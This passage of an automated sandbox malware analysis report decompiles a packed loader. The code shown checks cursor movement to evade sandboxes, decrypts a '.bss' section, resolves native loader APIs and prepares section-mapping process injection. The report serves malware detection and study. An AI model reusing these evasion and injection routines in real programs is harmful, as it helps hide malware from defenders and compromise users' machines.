      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00401070, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130threadsynchronization

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 109 401070-40108a call 401aa8 112 401090-40109f GetCursorPos 109->112 113 4011ea-4011f1 109->113 116 4010a0-4010b0 WaitForSingleObject 112->116 114 4011f3-4011f4 ExitProcess 113->114 115 4011fa-401202 113->115 117 4010b2-4010cf GetCursorPos call 401b1c 116->117 118 4010db-4010dd 116->118 121 4010d4-4010d9 117->121 118->113 120 4010e3-4010ea call 401c4a 118->120 124 4010f6-4010ff call 402653 120->124 125 4010ec 120->125 121->116 121->118 128 401105-40112a call 4026c5 124->128 129 4011dd-4011e0 124->129 125->124 133 401130-401151 128->133 134 4011da-4011dc 128->134 129->113 130 4011e2-4011e8 GetLastError 129->130 130->113 135 401153-401171 133->135 136 401177-40117a 133->136 134->129 135->135 137 401173 135->137 138 40117c-401180 136->138 139 40118d-401194 136->139 137->136 140 401182-40118b 138->140 141 401196 139->141 142 40119e-4011d1 GetCurrentThreadId GetCurrentThread call 40134b 139->142 140->139 140->140 141->142 144 4011d6-4011d8 142->144 144->129
    C-Code - Quality: 98%
    			E00401070() {
				unsigned int _v12;
				void _v28;
				long _v32;
				intOrPtr _v36;
				struct tagPOINT _v44;
				signed int _v48;
				struct tagPOINT _v56;
				signed int _v60;
				void* __esi;
				void* _t41;
				int _t42;
				signed int _t45;
				unsigned int _t50;
				long _t51;
				intOrPtr _t52;
				long _t54;
				int _t57;
				signed int _t60;
				int _t69;
				signed int _t72;
				signed int _t74;
				long _t76;
				signed int _t77;
				signed char* _t78;
				int* _t81;
				signed int* _t87;
				void* _t88;
				int _t90;
				signed int _t93;

				_v48 = _v48 & 0x00000000;
				_t90 = E00401AA8();
				if(_t90 != 0) {
					L21:
					if( *0x40548c == 0) {
						return _t90;
					}
					ExitProcess(_t90);
				}
				GetCursorPos( &_v44);
				_t90 = 0xc;
				while(WaitForSingleObject( *0x405474, 0x40) != 0) {
					GetCursorPos( &_v56);
					_t73 = _v44.y ^ _v44.x;
					_t69 = E00401B1C((_v56.y ^ _v56.x) - (_v44.y ^ _v44.x) & 0x0000001f); // executed
					_t90 = _t69;
					if(_t90 == 0xc) {
						continue;
					}
					break;
				}
				if(_t90 != 0) {
					goto L21;
				}
				_t41 = E00401C4A(_t73); // executed
				if(_t41 != 0) {
					 *0x405480 = 1;
				}
				_t42 = E00402653();
				_t90 = _t42;
				if(_t90 != 0) {
					L19:
					if(_t90 == 0xffffffff) {
						_t90 = GetLastError();
					}
					goto L21;
				} else {
					_t74 = 6;
					memset( &_v28, _t42, _t74 << 2);
					_t45 =  *0x405498; // 0x736c6e70
					if(E004026C5(0,  &_v28,  &_v12, _t45 ^ 0xed79247c) == 0) {
						_t90 = 0xb;
						goto L19;
					}
					_t50 = _v12;
					_v60 = _v60 & _t90;
					_t87 = _v28;
					_t72 =  *0x405494; // 0x0
					_t76 = _t50;
					_t51 = _t50 >> 2;
					_v44.x = _t76;
					_t81 = _t87;
					_v56.x = _t51;
					if(_t51 == 0) {
						L12:
						_t77 = _t76 & 0x00000003;
						if(_t77 == 0) {
							L15:
							if(( *0x405480 & 0x00000001) != 0) {
								_v48 = 0x10;
							}
							_t52 =  *0x405478; // 0xde4
							_v36 = _t52;
							_v32 = GetCurrentThreadId();
							_t54 =  *0x405474; // 0xcc
							_v44.x = _t54;
							_v44.y = GetCurrentThread();
							_t57 = E0040134B( &_v28,  &_v44, _v48); // executed
							_t90 = _t57;
							goto L19;
						}
						_t93 = _t77;
						_t78 = _t81;
						_t88 = _t87 - _t81;
						do {
							 *_t78 =  *(_t88 + _t78) ^ _t72;
							_t78 =  &(_t78[1]);
							_t93 = _t93 - 1;
						} while (_t93 != 0);
						goto L15;
					} else {
						goto L10;
					}
					do {
						L10:
						_v60 = _v60 + 1;
						_t60 =  *_t87;
						asm("rol eax, cl");
						_t87 =  &(_t87[1]);
						_t90 = _t60 ^ _t90 ^ _t72;
						 *_t81 = _t90;
						_t81 =  &(_t81[1]);
						_t22 =  &_v56;
						 *_t22 = _v56.x - 1;
					} while ( *_t22 != 0);
					_t76 = _v44.x;
					goto L12;
				}
			}
































    0x00401079
    0x00401086
    0x0040108a
    0x004011ea
    0x004011f1
    0x00401202
    0x00401202
    0x004011f4
    0x004011f4
    0x0040109b
    0x0040109f
    0x004010a0
    0x004010b7
    0x004010c5
    0x004010cf
    0x004010d4
    0x004010d9
    0x00000000
    0x00000000
    0x00000000
    0x004010d9
    0x004010dd
    0x00000000
    0x00000000
    0x004010e3
    0x004010ea
    0x004010ec
    0x004010ec
    0x004010f6
    0x004010fb
    0x004010ff
    0x004011dd
    0x004011e0
    0x004011e8
    0x004011e8
    0x00000000
    0x00401105
    0x00401107
    0x0040110c
    0x0040110e
    0x0040112a
    0x004011dc
    0x00000000
    0x004011dc
    0x00401130
    0x00401134
    0x00401138
    0x0040113c
    0x00401142
    0x00401144
    0x00401147
    0x0040114b
    0x0040114d
    0x00401151
    0x00401177
    0x00401177
    0x0040117a
    0x0040118d
    0x00401194
    0x00401196
    0x00401196
    0x0040119e
    0x004011a3
    0x004011ad
    0x004011b1
    0x004011b6
    0x004011c4
    0x004011d1
    0x004011d6
    0x00000000
    0x004011d6
    0x0040117c
    0x0040117e
    0x00401180
    0x00401182
    0x00401187
    0x00401189
    0x0040118a
    0x0040118a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401153
    0x00401153
    0x00401153
    0x00401157
    0x0040115d
    0x0040115f
    0x00401166
    0x00401168
    0x0040116a
    0x0040116d
    0x0040116d
    0x0040116d
    0x00401173
    0x00000000
    0x00401173

    APIs
      • Part of subcall function 00401AA8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401086,?,00000000), ref: 00401AB7
      • Part of subcall function 00401AA8: GetVersion.KERNEL32(?,00000000), ref: 00401AC6
      • Part of subcall function 00401AA8: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401ADD
      • Part of subcall function 00401AA8: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401AF6
    • GetCursorPos.USER32(?), ref: 0040109B
    • WaitForSingleObject.KERNEL32(00000040), ref: 004010A8
    • GetCursorPos.USER32(?), ref: 004010B7
      • Part of subcall function 00401B1C: lstrcpynA.KERNEL32(?,.bss,00000008,773DA47B,0000000C), ref: 00401B4A
      • Part of subcall function 00401B1C: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401BBD
      • Part of subcall function 00401B1C: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401C06
      • Part of subcall function 00401B1C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401C1F
      • Part of subcall function 00401C4A: GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,004010E8,?,00000000), ref: 00401C67
      • Part of subcall function 00401C4A: GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,004010E8,?,00000000), ref: 00401C78
      • Part of subcall function 00401C4A: IsWow64Process.KERNELBASE(000000CC,00000000,0000000C,?,?,004010E8,?,00000000), ref: 00401C90
      • Part of subcall function 00402653: GetModuleHandleA.KERNEL32(NTDLL.DLL,773DA47B,0000000C,?,?,004010FB,?,00000000), ref: 00402664
      • Part of subcall function 00402653: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,004010FB,?,00000000), ref: 00402674
    • GetLastError.KERNEL32(?,00000000), ref: 004011E2
      • Part of subcall function 004026C5: memcpy.NTDLL(00000000,?,?,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 004027A3
    • GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004011A7
    • GetCurrentThread.KERNEL32(?,00000000), ref: 004011BA
      • Part of subcall function 0040134B: memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401479
      • Part of subcall function 0040134B: memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004014C8
      • Part of subcall function 0040134B: memcpy.NTDLL(?,00401851,00000800,?,?,?,00000000), ref: 00401538
      • Part of subcall function 0040134B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00401563
      • Part of subcall function 0040134B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040156A
      • Part of subcall function 0040134B: CloseHandle.KERNEL32(00000000), ref: 00401579
      • Part of subcall function 0040134B: memset.NTDLL ref: 0040158D
    • ExitProcess.KERNEL32 ref: 004011F4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00401B1C, Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 105memorystring

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 145 401b1c-401b5d lstrcpynA 146 401b61-401b66 145->146 147 401b72-401b76 146->147 148 401b68-401b6e 146->148 150 401b78-401b7a 147->150 151 401b7c-401b7e 147->151 148->147 149 401b70 148->149 149->147 150->146 150->151 152 401b84-401b89 151->152 153 401c39 151->153 155 401c30-401c37 152->155 156 401b8f-401b93 152->156 154 401c40-401c47 153->154 155->154 156->155 157 401b99-401bc7 VirtualAlloc 156->157 158 401c27-401c2e 157->158 159 401bc9-401bfd call 402989 157->159 158->154 162 401c10 159->162 163 401bff-401c0e memcpy 159->163 164 401c17-401c25 VirtualFree 162->164 163->164 164->154
    C-Code - Quality: 82%
    			E00401B1C(intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v23;
				char _v24;
				signed int _v32;
				signed int _v36;
				void* _t38;
				intOrPtr* _t39;
				long _t41;
				void* _t42;
				intOrPtr _t46;
				char _t49;
				signed int _t50;
				intOrPtr _t51;
				intOrPtr _t60;
				void* _t65;
				intOrPtr _t66;
				void* _t71;
				intOrPtr _t72;

				_t66 =  *0x405484; // 0x400000
				_t49 = 0;
				_v24 = 0;
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_v16 = _t66;
				_v12 = 0;
				lstrcpynA( &_v24, ".bss", 8);
				_t6 = _t66 + 0x3c; // 0xe8
				_t38 =  *_t6 + _t66;
				_t50 =  *(_t38 + 6) & 0x0000ffff;
				_t39 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
				do {
					if( *_t39 == _v24 &&  *((intOrPtr*)(_t39 + 4)) == _v20) {
						_t49 = _t39;
					}
					_t39 = _t39 + 0x28;
					_t50 = _t50 - 1;
				} while (_t50 != 0 && _t49 == 0);
				if(_t49 == 0) {
					_v12 = 2;
				} else {
					_t51 =  *((intOrPtr*)(_t49 + 0xc));
					if(_t51 == 0 ||  *(_t49 + 0x10) == 0) {
						_v12 = 0xb;
					} else {
						_t41 =  *(_t49 + 0x10);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t71 = (_t41 + _t51 ^ _v36 ^ _v32) + _a4;
						_t42 = VirtualAlloc(0, _t41, 0x3000, 4); // executed
						_t65 = _t42;
						if(_t65 == 0) {
							_v12 = 8;
						} else {
							_t72 = _v16;
							E00402989(_t42,  *((intOrPtr*)(_t49 + 0xc)) + _t72,  *(_t49 + 0x10), _t71, 1);
							_t60 =  *((intOrPtr*)(_t49 + 0xc));
							_t46 =  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c4)) -  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061cc)) +  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c0));
							 *0x405498 = _t46;
							if(_t46 != 0x736c6e70) {
								_v12 = 0xc;
							} else {
								memcpy(_t60 + _t72, _t65,  *(_t49 + 0x10));
							}
							VirtualFree(_t65, 0, 0x8000); // executed
						}
					}
				}
				return _v12;
			}























    0x00401b24
    0x00401b2d
    0x00401b2f
    0x00401b35
    0x00401b36
    0x00401b3a
    0x00401b44
    0x00401b47
    0x00401b4a
    0x00401b50
    0x00401b53
    0x00401b59
    0x00401b5d
    0x00401b61
    0x00401b66
    0x00401b70
    0x00401b70
    0x00401b72
    0x00401b75
    0x00401b75
    0x00401b7e
    0x00401c39
    0x00401b84
    0x00401b84
    0x00401b89
    0x00401c30
    0x00401b99
    0x00401b99
    0x00401ba4
    0x00401ba5
    0x00401ba6
    0x00401bb8
    0x00401bbd
    0x00401bc3
    0x00401bc7
    0x00401c27
    0x00401bc9
    0x00401bcf
    0x00401bd7
    0x00401bdc
    0x00401bf1
    0x00401bf8
    0x00401bfd
    0x00401c10
    0x00401bff
    0x00401c06
    0x00401c0b
    0x00401c1f
    0x00401c1f
    0x00401bc7
    0x00401b89
    0x00401c47

    APIs
    • lstrcpynA.KERNEL32(?,.bss,00000008,773DA47B,0000000C), ref: 00401B4A
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401BBD
    • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401C06
    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401C1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00401203, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 165 401203-401212 166 401214-40121f 165->166 167 40122e-401240 GetModuleHandleA 165->167 166->167 168 401221-40122c 166->168 169 401242-40125a call 401c9f 167->169 170 4012a5-4012a9 167->170 168->167 171 401292-4012a2 memcpy 168->171 169->170 174 40125c-401274 call 401c9f 169->174 171->170 174->170 177 401276-40127b call 401c9f 174->177 179 401280-40128e 177->179 179->170 180 401290 179->180 180->171
    C-Code - Quality: 86%
    			E00401203(signed int __edx, void* _a4) {
				void* __edi;
				struct HINSTANCE__* _t4;
				signed int _t6;
				signed int _t8;
				signed int _t10;
				void* _t17;
				void* _t18;
				signed int _t19;
				void* _t21;

				_t19 = __edx;
				_t21 = 0;
				if(( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0 || ( *0x405454 |  *0x405458) == 0) {
					_t21 = 0x7f;
					_t4 = GetModuleHandleA("NTDLL.DLL");
					_t20 = _t4;
					if(_t4 != 0) {
						_t6 = E00401C9F(_t17, _t18, _t20, "LdrLoadDll"); // executed
						asm("cdq");
						 *0x405444 = _t6;
						 *0x405448 = _t19;
						if((_t6 | _t19) != 0) {
							_t8 = E00401C9F(_t17, _t18, _t20, "LdrGetProcedureAddress"); // executed
							asm("cdq");
							 *0x40544c = _t8;
							 *0x405450 = _t19;
							if((_t8 | _t19) != 0) {
								_t10 = E00401C9F(_t17, _t18, _t20, "ZwProtectVirtualMemory"); // executed
								asm("cdq");
								 *0x405454 = _t10;
								 *0x405458 = _t19;
								if((_t10 | _t19) != 0) {
									_t21 = 0;
									goto L8;
								}
							}
						}
					}
				} else {
					L8:
					memcpy(_a4, "3!Pw", 0x18);
				}
				return _t21;
			}












    0x00401203
    0x00401209
    0x00401212
    0x00401230
    0x00401236
    0x0040123c
    0x00401240
    0x00401247
    0x0040124c
    0x0040124d
    0x00401254
    0x0040125a
    0x00401261
    0x00401266
    0x00401267
    0x0040126e
    0x00401274
    0x0040127b
    0x00401280
    0x00401281
    0x00401288
    0x0040128e
    0x00401290
    0x00000000
    0x00401290
    0x0040128e
    0x00401274
    0x0040125a
    0x00401292
    0x00401292
    0x0040129d
    0x004012a2
    0x004012a9

    APIs
    • GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00401525,?,?,?,00000000), ref: 00401236
      • Part of subcall function 00401C9F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401CEF
      • Part of subcall function 00401C9F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00401D01
      • Part of subcall function 00401C9F: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00401D19
      • Part of subcall function 00401C9F: CloseHandle.KERNEL32(?), ref: 00401D34
    • memcpy.NTDLL(?,3!Pw,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 0040129D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A3B68, Relevance: 10.6, APIs: 7, Instructions: 81native

    Control-flow Graph

    APIs
    • NtOpenProcess.NTDLL(00000000,00000400,?,012A1E91), ref: 012A3BAF
    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 012A3BC2
    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012A3BDE
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 012A3BFB
    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 012A3C08
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    • NtClose.NTDLL(?), ref: 012A3C1A
    • NtClose.NTDLL(00000000), ref: 012A3C24
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A44A2, Relevance: 9.1, APIs: 6, Instructions: 90memory

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 280 12a44a2-12a44d3 call 12a3b15 284 12a4516-12a4529 GetComputerNameW 280->284 285 12a44d5-12a44ea RtlAllocateHeap 280->285 286 12a452b-12a453f RtlAllocateHeap 284->286 287 12a456d-12a458f 284->287 285->284 288 12a44ec-12a44f5 285->288 286->287 289 12a4541-12a454e GetComputerNameW 286->289 293 12a4506-12a4510 HeapFree 288->293 294 12a44f7-12a4504 call 12a27bb 288->294 290 12a455f-12a4567 HeapFree 289->290 291 12a4550-12a455c call 12a27bb 289->291 290->287 291->290 293->284 294->293
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A44DF
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A4510
    • GetComputerNameW.KERNEL32(00000000,?), ref: 012A451E
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A4535
    • GetComputerNameW.KERNEL32(00000000,?), ref: 012A4546
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A4567
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 0040218D, Relevance: 6.1, APIs: 4, Instructions: 92

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 346 40218d-4021c0 memset 347 4021c6-4021db call 402603 346->347 348 40228a 346->348 352 4021e1-4021f5 call 40259f 347->352 353 40229d-4022a3 GetLastError 347->353 369 40228d call 12ae018 348->369 370 40228d call 12a1129 348->370 371 40228d call 12ae040 348->371 351 402290-402292 351->353 354 402294 351->354 357 402297-40229b 352->357 359 4021fb-40223b memcpy 352->359 355 4022a6-4022ac 353->355 354->357 357->353 357->355 360 402253-402262 call 4025c0 359->360 361 40223d-402242 359->361 360->355 365 402264-402272 360->365 361->360 362 402244-402250 361->362 362->360 366 402274-40227f RtlNtStatusToDosError 365->366 367 402285-402288 365->367 366->367 367->357 369->351 370->351 371->351
    C-Code - Quality: 77%
    			E0040218D(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
				long _v8;
				char _v12;
				intOrPtr _v544;
				intOrPtr _v552;
				void _v724;
				char _v728;
				long _t39;
				long _t47;
				intOrPtr _t54;
				void* _t55;
				intOrPtr* _t57;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				void* _t66;

				_t62 = __esi;
				_t59 = __edx;
				_t55 = __ecx;
				_t60 = __eax;
				_v728 = 0;
				memset( &_v724, 0, 0x2c8);
				_t66 =  *((intOrPtr*)(_t60 + 8)) -  *0x405478; // 0xde4
				if(_t66 == 0) {
					_push( *((intOrPtr*)(__esi + 0x10)));
					if( *((intOrPtr*)(__esi + 8))() == 0) {
						goto L13;
					} else {
						_v8 = 0;
						goto L12;
					}
				} else {
					_v728 = 0x10003;
					_t54 = E00402603(_t55,  *_t60);
					if(_t54 == 0) {
						L13:
						_v8 = GetLastError();
					} else {
						_t39 = E0040259F( *((intOrPtr*)(_t60 + 4)),  &_v728);
						_v8 = _t39;
						if(_t39 != 0) {
							L12:
							if(_v8 == 0xffffffff) {
								goto L13;
							}
						} else {
							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
							 *__esi = _v544;
							_t11 = _t54 + 0x218; // 0x218
							_v544 = _t11;
							_t13 = _t62 + 0x218; // 0x218
							_v552 = _t54;
							memcpy(_t13, E00402C82, 0x100);
							_t16 = _t62 + 0x18; // 0x18
							asm("cdq");
							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t59) {
								asm("adc ecx, ecx");
								 *((intOrPtr*)(__esi + 0x10)) = _t54 + 0x18;
								 *((intOrPtr*)(__esi + 0x14)) = 0;
							}
							if(E004025C0( *_t60, _t54, _t62,  &_v12) != 0) {
								_t57 =  *0x405020;
								_t61 =  *((intOrPtr*)(_t60 + 4));
								_t47 = 0x7f;
								if(_t57 != 0) {
									_t47 = RtlNtStatusToDosError( *_t57(_t61,  &_v728));
								}
								_v8 = _t47;
								goto L12;
							}
						}
					}
				}
				return _v8;
			}



















    0x0040218d
    0x0040218d
    0x0040218d
    0x0040219f
    0x004021a9
    0x004021af
    0x004021ba
    0x004021c0
    0x0040228a
    0x00402292
    0x00000000
    0x00402294
    0x00402294
    0x00000000
    0x00402294
    0x004021c6
    0x004021c8
    0x004021d7
    0x004021db
    0x0040229d
    0x004022a3
    0x004021e1
    0x004021eb
    0x004021f2
    0x004021f5
    0x00402297
    0x0040229b
    0x00000000
    0x00000000
    0x004021fb
    0x00402201
    0x00402205
    0x00402207
    0x00402212
    0x00402218
    0x00402224
    0x0040222a
    0x00402232
    0x00402235
    0x0040223b
    0x0040224b
    0x0040224d
    0x00402250
    0x00402250
    0x00402262
    0x00402264
    0x0040226c
    0x00402271
    0x00402272
    0x0040227f
    0x0040227f
    0x00402285
    0x00000000
    0x00402285
    0x00402262
    0x004021f5
    0x004021db
    0x004022ac

    APIs
    • memset.NTDLL ref: 004021AF
    • GetLastError.KERNEL32(?,00000318,00000008), ref: 0040229D
      • Part of subcall function 00402603: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
      • Part of subcall function 00402603: SetLastError.KERNEL32(00000000), ref: 00402642
      • Part of subcall function 0040259F: RtlNtStatusToDosError.NTDLL(00000000), ref: 004025B7
    • memcpy.NTDLL(00000218,00402C82,00000100,?,00010003,?,?,00000318,00000008), ref: 0040222A
      • Part of subcall function 004025C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
      • Part of subcall function 004025C0: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040227F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 004015E5, Relevance: 6.1, APIs: 4, Instructions: 79native
    C-Code - Quality: 50%
    			E004015E5(intOrPtr _a4, void** _a8, void* _a12) {
				int _v12;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				long _v36;
				int _v40;
				int _v44;
				void* _v48;
				long _t29;
				long _t33;
				long _t37;
				intOrPtr* _t41;
				long _t45;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t41 = _a12;
				asm("stosd");
				_v24 = _a4;
				_t29 = 0x40;
				_v36 = _t29;
				_a12 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
				if(_t33 < 0) {
					_t45 = RtlNtStatusToDosError(_t33);
				} else {
					_t37 = E004015A6(_a12, 0xffffffff,  &_v12); // executed
					_t45 = _t37;
					if(_t45 == 0) {
						memset(_v12, 0, _v24);
						 *_a8 = _v12;
						if(_t41 != 0) {
							 *_t41 = _a12;
						}
					}
				}
				if(_a12 != 0 && _t41 == 0) {
					__imp__ZwClose(_a12);
				}
				return _t45;
			}

















    0x004015f3
    0x004015f4
    0x004015f5
    0x004015f6
    0x004015f7
    0x004015f8
    0x00401604
    0x00401608
    0x0040160b
    0x00401613
    0x00401627
    0x0040162a
    0x0040162d
    0x00401634
    0x00401637
    0x0040163a
    0x0040163d
    0x00401640
    0x00401648
    0x00401687
    0x0040164a
    0x00401653
    0x00401658
    0x0040165c
    0x00401665
    0x00401675
    0x00401677
    0x0040167c
    0x0040167c
    0x00401677
    0x0040165c
    0x0040168c
    0x00401695
    0x00401695
    0x004016a1

    APIs
    • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00401640
    • memset.NTDLL ref: 00401665
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 00401681
    • ZwClose.NTDLL(?), ref: 00401695
      • Part of subcall function 004015A6: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
      • Part of subcall function 004015A6: RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012AE040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226native
    APIs
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE1E1
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE24B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    Function 012AE018, Relevance: 3.2, APIs: 2, Instructions: 207native
    APIs
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE1E1
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE24B
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    Function 012A1BC6, Relevance: 3.0, APIs: 2, Instructions: 48memorytime
    APIs
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
    • GetSystemTimeAsFileTime.KERNEL32(?,012A1D55,00000000,?,00000000,?,00000000,?,?,012A1D55), ref: 012A1BFC
